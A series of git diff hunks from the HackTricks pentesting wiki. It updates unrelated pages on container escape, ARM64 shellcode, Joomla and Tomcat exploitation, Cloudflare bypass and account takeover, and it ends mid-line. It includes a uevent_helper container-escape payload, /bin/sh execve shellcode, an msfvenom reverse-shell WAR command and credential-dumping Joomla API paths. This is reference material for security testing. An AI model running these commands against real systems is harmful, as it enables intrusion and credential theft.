* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
@ -28,6 +28,13 @@ When we run these two functions **sequentially**:
|
||||||
|
|
||||||
This behavior illustrates a key concept in low-level programming: **Memory management is crucial**, and uninitialized variables can lead to unpredictable behavior or security vulnerabilities, as they may unintentionally hold sensitive data left in memory.
|
This behavior illustrates a key concept in low-level programming: **Memory management is crucial**, and uninitialized variables can lead to unpredictable behavior or security vulnerabilities, as they may unintentionally hold sensitive data left in memory.
|
||||||
|
|
||||||
|
Uninitialized stack variables could pose several security risks like:
|
||||||
|
|
||||||
|
* **Data Leakage**: Sensitive information such as passwords, encryption keys, or personal details can be exposed if stored in uninitialized variables, allowing attackers to potentially read this data.
|
||||||
|
* **Information Disclosure**: The contents of uninitialized variables might reveal details about the program's memory layout or internal operations, aiding attackers in developing targeted exploits.
|
||||||
|
* **Crashes and Instability**: Operations involving uninitialized variables can result in undefined behavior, leading to program crashes or unpredictable outcomes.
|
||||||
|
* **Arbitrary Code Execution**: In certain scenarios, attackers could exploit these vulnerabilities to alter the program's execution flow, enabling them to execute arbitrary code, which might include remote code execution threats.
|
||||||
|
|
||||||
### Example
|
### Example
|
||||||
|
|
||||||
```c
|
```c
|
||||||
|
@ -66,6 +73,10 @@ int main() {
|
||||||
* **`demonstrateUninitializedVar` Function**: In this function, we declare an integer variable `uninitializedVar` without initializing it. When we attempt to print its value, the output might show a random number. This number represents whatever data was previously at that memory location. Depending on the environment and compiler, the actual output can vary, and sometimes, for safety, some compilers might automatically initialize variables to zero, though this should not be relied upon.
|
* **`demonstrateUninitializedVar` Function**: In this function, we declare an integer variable `uninitializedVar` without initializing it. When we attempt to print its value, the output might show a random number. This number represents whatever data was previously at that memory location. Depending on the environment and compiler, the actual output can vary, and sometimes, for safety, some compilers might automatically initialize variables to zero, though this should not be relied upon.
|
||||||
* **`main` Function**: The `main` function calls both of the above functions in sequence, demonstrating the contrast between an initialized variable and an uninitialized one.
|
* **`main` Function**: The `main` function calls both of the above functions in sequence, demonstrating the contrast between an initialized variable and an uninitialized one.
|
||||||
|
|
||||||
|
## ARM64 Example
|
||||||
|
|
||||||
|
This doesn't change at all in ARM64 as local variables are also managed in the stack, you can [**check this example**](https://8ksec.io/arm64-reversing-and-exploitation-part-6-exploiting-an-uninitialized-stack-variable-vulnerability/) were this is shown.
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -185,6 +185,10 @@ It's common to have a cron job such as
|
||||||
to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\
|
to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\
|
||||||
Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/).
|
Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/).
|
||||||
|
|
||||||
|
### Mail DMARC information
|
||||||
|
|
||||||
|
You can use a web such as [https://dmarc.live/info/google.com](https://dmarc.live/info/google.com) or a tool such as [https://github.com/Tedixx/dmarc-subdomains](https://github.com/Tedixx/dmarc-subdomains) to find **domains and subdomain sharing the same dmarc information**.
|
||||||
|
|
||||||
### **Passive Takeover**
|
### **Passive Takeover**
|
||||||
|
|
||||||
Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**.
|
Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**.
|
||||||
|
@ -223,6 +227,10 @@ _Note that sometimes the domain is hosted inside an IP that is not controlled by
|
||||||
|
|
||||||
It's time to find all the possible subdomains of each found domain.
|
It's time to find all the possible subdomains of each found domain.
|
||||||
|
|
||||||
|
{% hint style="success" %}
|
||||||
|
Note that some of the tools and techniques to find domains can also help to find subdomains!
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
### **DNS**
|
### **DNS**
|
||||||
|
|
||||||
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).
|
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
{% embed url="https://websec.nl/" %}
|
{% embed url="https://websec.nl/" %}
|
||||||
|
|
||||||
|
@ -138,23 +138,23 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
|
||||||
* Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers.
|
* Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers.
|
||||||
* **Example for Exploitation**: %%%bash
|
* **Example for Exploitation**: %%%bash
|
||||||
|
|
||||||
## Creates a payload
|
### Creates a payload
|
||||||
|
|
||||||
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
|
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
|
||||||
|
|
||||||
## Finds host path from OverlayFS mount for container
|
### Finds host path from OverlayFS mount for container
|
||||||
|
|
||||||
host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
|
host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
|
||||||
|
|
||||||
## Sets uevent\_helper to malicious helper
|
### Sets uevent\_helper to malicious helper
|
||||||
|
|
||||||
echo "$host\_path/evil-helper" > /sys/kernel/uevent\_helper
|
echo "$host\_path/evil-helper" > /sys/kernel/uevent\_helper
|
||||||
|
|
||||||
## Triggers a uevent
|
### Triggers a uevent
|
||||||
|
|
||||||
echo change > /sys/class/mem/null/uevent
|
echo change > /sys/class/mem/null/uevent
|
||||||
|
|
||||||
## Reads the output
|
### Reads the output
|
||||||
|
|
||||||
cat /output %%%
|
cat /output %%%
|
||||||
|
|
||||||
|
@ -187,7 +187,7 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
|
||||||
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
|
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
|
||||||
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
|
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
{% embed url="https://websec.nl/" %}
|
{% embed url="https://websec.nl/" %}
|
||||||
|
|
||||||
|
|
|
@ -519,6 +519,24 @@ _main:
|
||||||
|
|
||||||
```
|
```
|
||||||
{% endtab %}
|
{% endtab %}
|
||||||
|
|
||||||
|
{% tab title="with adr for linux" %}
|
||||||
|
```armasm
|
||||||
|
; From https://8ksec.io/arm64-reversing-and-exploitation-part-5-writing-shellcode-8ksec-blogs/
|
||||||
|
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
|
||||||
|
.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
|
||||||
|
.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4).
|
||||||
|
|
||||||
|
_main:
|
||||||
|
adr x0, sh_path ; This is the address of "/bin/sh".
|
||||||
|
mov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.
|
||||||
|
mov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.
|
||||||
|
mov x16, #59 ; Move the execve syscall number (59) into x16.
|
||||||
|
svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16.
|
||||||
|
|
||||||
|
sh_path: .asciz "/bin/sh"
|
||||||
|
```
|
||||||
|
{% endtab %}
|
||||||
{% endtabs %}
|
{% endtabs %}
|
||||||
|
|
||||||
#### Read with cat
|
#### Read with cat
|
||||||
|
|
|
@ -27,7 +27,7 @@ PORT STATE SERVICE REASON
|
||||||
|
|
||||||
## Inspecting the traffic
|
## Inspecting the traffic
|
||||||
|
|
||||||
hen a **CONNECT** packet is received by MQTT brokers, a **CONNACK** packet is sent back. This packet contains a return code which is crucial for understanding the connection status. A return code of **0x00** means that the credentials have been accepted, signifying a successful connection. On the other hand, a return code of **0x05** signals that the credentials are invalid, thus preventing the connection.
|
When a **CONNECT** packet is received by MQTT brokers, a **CONNACK** packet is sent back. This packet contains a return code which is crucial for understanding the connection status. A return code of **0x00** means that the credentials have been accepted, signifying a successful connection. On the other hand, a return code of **0x05** signals that the credentials are invalid, thus preventing the connection.
|
||||||
|
|
||||||
For instance, if the broker rejects the connection due to invalid credentials, the scenario would look something like this:
|
For instance, if the broker rejects the connection due to invalid credentials, the scenario would look something like this:
|
||||||
|
|
||||||
|
@ -60,7 +60,8 @@ You can also use:
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
apt-get install mosquitto mosquitto-clients
|
apt-get install mosquitto mosquitto-clients
|
||||||
mosquitto_sub -t 'test/topic' -v #Subscriribe to 'test/topic'
|
mosquitto_sub -t 'test/topic' -v #Subscribe to 'test/topic'
|
||||||
|
mosquitto_sub -h <host-ip> -t "#" -v #Subscribe to ALL topics.
|
||||||
```
|
```
|
||||||
|
|
||||||
Or you could **run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them**:
|
Or you could **run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them**:
|
||||||
|
|
|
@ -44,7 +44,7 @@ vncviewer [-passwd passwd.txt] <IP>::5901
|
||||||
|
|
||||||
Default **password is stored** in: \~/.vnc/passwd
|
Default **password is stored** in: \~/.vnc/passwd
|
||||||
|
|
||||||
If you have the VNC password and it looks encrypted (a few bytes, like if it could be and encrypted password). It is probably ciphered with 3des. You can get the clear text password using [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd)
|
If you have the VNC password and it looks encrypted (a few bytes, like if it could be an encrypted password), it is probably ciphered with 3des. You can get the clear text password using [https://github.com/jeroennijhof/vncpwd](https://github.com/jeroennijhof/vncpwd)
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
make
|
make
|
||||||
|
|
|
@ -285,6 +285,7 @@ Tools:
|
||||||
* [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
|
* [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
|
||||||
* [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
|
* [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
|
||||||
* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
|
* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
|
||||||
|
* [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths)
|
||||||
* _/usr/share/wordlists/dirb/common.txt_
|
* _/usr/share/wordlists/dirb/common.txt_
|
||||||
* _/usr/share/wordlists/dirb/big.txt_
|
* _/usr/share/wordlists/dirb/big.txt_
|
||||||
* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
|
* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
|
||||||
|
|
|
@ -92,6 +92,16 @@ droopescan scan joomla --url http://joomla-site.local/
|
||||||
|
|
||||||
In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](./#cms-scanners) that can scan Joomla.
|
In[ **80,443 - Pentesting Web Methodology is a section about CMS scanners**](./#cms-scanners) that can scan Joomla.
|
||||||
|
|
||||||
|
|
||||||
|
### API Unauthenticated Information Disclosure:
|
||||||
|
Versions From 4.0.0 to 4.2.7 are vulnerable to Unauthenticated information disclosure (CVE-2023-23752) that will dump creds and other information.
|
||||||
|
|
||||||
|
* Users: `http://<host>/api/v1/users?public=true`
|
||||||
|
|
||||||
|
* Config File: `http://<host>/api/index.php/v1/config/application?public=true`
|
||||||
|
|
||||||
|
**MSF Module**: `scanner/http/joomla_api_improper_access_checks` or ruby script: [51334](https://www.exploit-db.com/exploits/51334)
|
||||||
|
|
||||||
### Brute-Force
|
### Brute-Force
|
||||||
|
|
||||||
You can use this [script](https://github.com/ajnik/joomla-bruteforce) to attempt to brute force the login.
|
You can use this [script](https://github.com/ajnik/joomla-bruteforce) to attempt to brute force the login.
|
||||||
|
|
|
@ -75,8 +75,8 @@ A hop-by-hop header is a header which is designed to be processed and consumed b
|
||||||
* **`Age`** defines the times in seconds the object has been in the proxy cache.
|
* **`Age`** defines the times in seconds the object has been in the proxy cache.
|
||||||
* **`Server-Timing: cdn-cache; desc=HIT`** also indicates that a resource was cached
|
* **`Server-Timing: cdn-cache; desc=HIT`** also indicates that a resource was cached
|
||||||
|
|
||||||
{% content-ref url="../../pentesting-web/cache-deception.md" %}
|
{% content-ref url="../../pentesting-web/cache-deception/" %}
|
||||||
[cache-deception.md](../../pentesting-web/cache-deception.md)
|
[cache-deception](../../pentesting-web/cache-deception/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
**Local Cache headers**:
|
**Local Cache headers**:
|
||||||
|
|
|
@ -161,7 +161,7 @@ msf exploit(multi/http/tomcat_mgr_upload) > exploit
|
||||||
1. Create the war to deploy:
|
1. Create the war to deploy:
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
|
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
|
||||||
```
|
```
|
||||||
|
|
||||||
2. Upload the `revshell.war` file and access to it (`/revshell/`):
|
2. Upload the `revshell.war` file and access to it (`/revshell/`):
|
||||||
|
|
|
@ -9,12 +9,11 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
## Common Techniques to Uncover Cloudflare
|
## Common Techniques to Uncover Cloudflare
|
||||||
|
|
||||||
* You can use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before.
|
* You can use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before.
|
||||||
|
@ -30,6 +29,7 @@ Other ways to support HackTricks:
|
||||||
* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) or [https://crimeflare.herokuapp.com](https://crimeflare.herokuapp.com). Or use the tool [CloudPeler](https://github.com/zidansec/CloudPeler) (which uses that API)
|
* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) or [https://crimeflare.herokuapp.com](https://crimeflare.herokuapp.com). Or use the tool [CloudPeler](https://github.com/zidansec/CloudPeler) (which uses that API)
|
||||||
* Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/)
|
* Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/)
|
||||||
* [**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs.
|
* [**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs.
|
||||||
|
* [**CloakQuest3r**](https://github.com/spyboy-productions/CloakQuest3r): CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare and other alternatives, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield.
|
||||||
* [Censys](https://search.censys.io/)
|
* [Censys](https://search.censys.io/)
|
||||||
* [Shodan](https://shodan.io/)
|
* [Shodan](https://shodan.io/)
|
||||||
* [Bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)
|
* [Bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)
|
||||||
|
@ -49,7 +49,7 @@ for ir in `curl https://ip-ranges.amazonaws.com/ip-ranges.json | jq -r '.prefixe
|
||||||
done
|
done
|
||||||
```
|
```
|
||||||
|
|
||||||
## Uncovering Cloudflare from Cloud machines
|
## Uncovering Cloudflare from Cloud infrastructure
|
||||||
|
|
||||||
Note that even if this was done for AWS machines, it could be done for any other cloud provider.
|
Note that even if this was done for AWS machines, it could be done for any other cloud provider.
|
||||||
|
|
||||||
|
@ -80,7 +80,7 @@ This mechanism relies on **client** [**SSL certificates**](https://socradar.io/h
|
||||||
Instead of configuring it's own certificate, customers can simple use Cloudflare’s certificate to allow any connection from Cloudflare, **regardless of the tenant**.
|
Instead of configuring it's own certificate, customers can simple use Cloudflare’s certificate to allow any connection from Cloudflare, **regardless of the tenant**.
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
Therefore, an attacker could just set a **domain in Cloudflare using CLoudflares certificate and point** it to the **victim** domain **IP** address. This way, setting his domain completely unprotected, Cloudflare won't protect the requests sent.
|
Therefore, an attacker could just set a **domain in Cloudflare using Cloudflare's certificate and point** it to the **victim** domain **IP** address. This way, setting his domain completely unprotected, Cloudflare won't protect the requests sent.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
More info [**here**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/).
|
More info [**here**](https://socradar.io/cloudflare-protection-bypass-vulnerability-on-threat-actors-radar/).
|
||||||
|
@ -100,6 +100,12 @@ Sometimes you just want to bypass Cloudflare to only scrape the web page. There
|
||||||
* Use Google cache: `https://webcache.googleusercontent.com/search?q=cache:https://www.petsathome.com/shop/en/pets/dog`
|
* Use Google cache: `https://webcache.googleusercontent.com/search?q=cache:https://www.petsathome.com/shop/en/pets/dog`
|
||||||
* Use other cache services such as [https://archive.org/web/](https://archive.org/web/)
|
* Use other cache services such as [https://archive.org/web/](https://archive.org/web/)
|
||||||
|
|
||||||
|
### Tools
|
||||||
|
|
||||||
|
Some tools like the following ones can bypass (or were able to bypass) Cloudflare's protection against scraping:
|
||||||
|
|
||||||
|
* [https://github.com/sarperavci/CloudflareBypassForScraping](https://github.com/sarperavci/CloudflareBypassForScraping)
|
||||||
|
|
||||||
### Cloudflare Solvers
|
### Cloudflare Solvers
|
||||||
|
|
||||||
There have been a number of Cloudflare solvers developed:
|
There have been a number of Cloudflare solvers developed:
|
||||||
|
@ -122,13 +128,14 @@ Use a headless browser that isn't deetcted as an automated browser (you might ne
|
||||||
|
|
||||||
### Smart Proxy With Cloudflare Built-In Bypass <a href="#option-5-smart-proxy-with-cloudflare-built-in-bypass" id="option-5-smart-proxy-with-cloudflare-built-in-bypass"></a>
|
### Smart Proxy With Cloudflare Built-In Bypass <a href="#option-5-smart-proxy-with-cloudflare-built-in-bypass" id="option-5-smart-proxy-with-cloudflare-built-in-bypass"></a>
|
||||||
|
|
||||||
**Smart proxies** proxies are continuously updated by specialized companies, aiming to outmaneuver Cloudflare's security measures (as thats their business).
|
**Smart proxies** proxies are continuously updated by specialized companies, aiming to outmaneuver Cloudflare's security measures (as thats their business).
|
||||||
|
|
||||||
Som of them are:
|
Som of them are:
|
||||||
* [ScraperAPI](https://www.scraperapi.com/?fp_ref=scrapeops)
|
|
||||||
|
* [ScraperAPI](https://www.scraperapi.com/?fp\_ref=scrapeops)
|
||||||
* [Scrapingbee](https://www.scrapingbee.com/?fpr=scrapeops)
|
* [Scrapingbee](https://www.scrapingbee.com/?fpr=scrapeops)
|
||||||
* [Oxylabs](https://oxylabs.go2cloud.org/aff_c?offer_id=7&aff_id=379&url_id=32)
|
* [Oxylabs](https://oxylabs.go2cloud.org/aff\_c?offer\_id=7\&aff\_id=379\&url\_id=32)
|
||||||
* [Smartproxy](https://prf.hn/click/camref:1100loxdG/[p_id:1100l442001]/destination:https%3A%2F%2Fsmartproxy.com%2Fscraping%2Fweb) are noted for their proprietary Cloudflare bypass mechanisms.
|
* [Smartproxy](https://prf.hn/click/camref:1100loxdG/\[p\_id:1100l442001]/destination:https%3A%2F%2Fsmartproxy.com%2Fscraping%2Fweb) are noted for their proprietary Cloudflare bypass mechanisms.
|
||||||
|
|
||||||
For those seeking an optimized solution, the [ScrapeOps Proxy Aggregator](https://scrapeops.io/proxy-aggregator/) stands out. This service integrates over 20 proxy providers into a single API, automatically selecting the best and most cost-effective proxy for your target domains, thus offering a superior option for navigating Cloudflare's defenses.
|
For those seeking an optimized solution, the [ScrapeOps Proxy Aggregator](https://scrapeops.io/proxy-aggregator/) stands out. This service integrates over 20 proxy providers into a single API, automatically selecting the best and most cost-effective proxy for your target domains, thus offering a superior option for navigating Cloudflare's defenses.
|
||||||
|
|
||||||
|
@ -142,8 +149,6 @@ Reverse engineering Cloudflare's anti-bot measures is a tactic used by smart pro
|
||||||
|
|
||||||
Find more info about how to do this in the [original article](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/).
|
Find more info about how to do this in the [original article](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/).
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)
|
* [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)
|
||||||
|
@ -157,7 +162,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -9,7 +9,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
@ -38,7 +38,6 @@ Should the target system allow the **reset link to be reused**, efforts should b
|
||||||
2. One should wait until the victim signs up using OAuth and confirms the account.
|
2. One should wait until the victim signs up using OAuth and confirms the account.
|
||||||
3. It is hoped that the regular signup will be confirmed, allowing access to the victim's account.
|
3. It is hoped that the regular signup will be confirmed, allowing access to the victim's account.
|
||||||
|
|
||||||
|
|
||||||
## **CORS Misconfiguration to Account Takeover**
|
## **CORS Misconfiguration to Account Takeover**
|
||||||
|
|
||||||
If the page contains **CORS missconfigurations** you might be able to **steal sensitive information** from the user to **takeover his account** or make him change auth information for the same purpose:
|
If the page contains **CORS missconfigurations** you might be able to **steal sensitive information** from the user to **takeover his account** or make him change auth information for the same purpose:
|
||||||
|
@ -97,16 +96,26 @@ If the authentication response could be **reduced to a simple boolean just try t
|
||||||
## Response Manipulation
|
## Response Manipulation
|
||||||
|
|
||||||
1. **Code Manipulation**: The status code is altered to `200 OK`.
|
1. **Code Manipulation**: The status code is altered to `200 OK`.
|
||||||
2. **Code and Body Manipulation**:
|
2. **Code and Body Manipulation**:
|
||||||
